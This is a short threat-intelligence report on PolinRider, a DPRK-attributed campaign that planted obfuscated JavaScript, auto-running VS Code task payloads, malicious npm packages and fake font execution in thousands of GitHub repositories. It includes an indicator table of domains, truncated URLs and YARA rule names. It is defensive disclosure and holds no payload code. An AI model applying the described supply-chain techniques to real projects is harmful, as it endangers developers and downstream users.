PolinRider: DPRK Threat Actor Implants Malware in Hundreds of GitHub Repos
2026-04-11 • OSM •
OpenSourceMalware attributes PolinRider to a DPRK-linked actor connected to Lazarus activity, Contagious Interview, and TasksJacker, with confirmed infections across 1,951 public GitHub repositories and 1,047 owners as of April 11, 2026. The campaign appended obfuscated JavaScript to real project configuration files and expanded into multiple vectors, including .vscode/tasks.json curl-to-shell payloads, malicious npm dependencies, fake .woff2 font execution, and propagation scripts that amended and force-pushed Git commits while preserving prior metadata. The report ties the activity to developer supply-chain compromise through infected open-source projects, weaponized take-home tests such as ShoeVista and StakingGame, and Vercel-hosted C2 subdomains including default-configuration.vercel.app. The scale and reinfection evidence show an active operation against developers and downstream users rather than isolated repository defacement.
Indicators of Compromise
| Type | Value | First Seen | Last Seen |
|---|---|---|---|
| DOMAIN | api.trongrid.io | 2025-10-27 | 2026-05-31 |
| DOMAIN | fullnode.mainnet.aptoslabs.com | 2025-10-27 | 2026-05-31 |
| DOMAIN | onrender.com | 2024-08-23 | 2026-04-12 |
| YARA | rmcej_otb_payload | 2026-04-11 | 2026-04-11 |
| YARA | polinrider_payload | 2026-04-11 | 2026-04-11 |
| URL | https://fullnode.mainnet.aptosl… | 2026-03-08 | 2026-04-11 |
| URL | https://wolf-studios-frontend.v… | 2026-03-08 | 2026-04-11 |
| URL | https://api.trongrid.io/v1/acco… | 2026-03-08 | 2026-04-11 |
| DOMAIN | gowreesh-vt.github.io | 2026-03-08 | 2026-04-11 |
| DOMAIN | shop.ceenami.com | 2026-03-08 | 2026-04-11 |
| URL | https://api.trongrid.io/v1/acco… | 2026-01-14 | 2026-04-11 |
| URL | https://fullnode.mainnet.aptosl… | 2026-01-14 | 2026-04-11 |
| DOMAIN | bsc-dataseed.binance.org | 2025-10-27 | 2026-04-11 |
| DOMAIN | bsc-rpc.publicnode.com | 2025-10-27 | 2026-04-11 |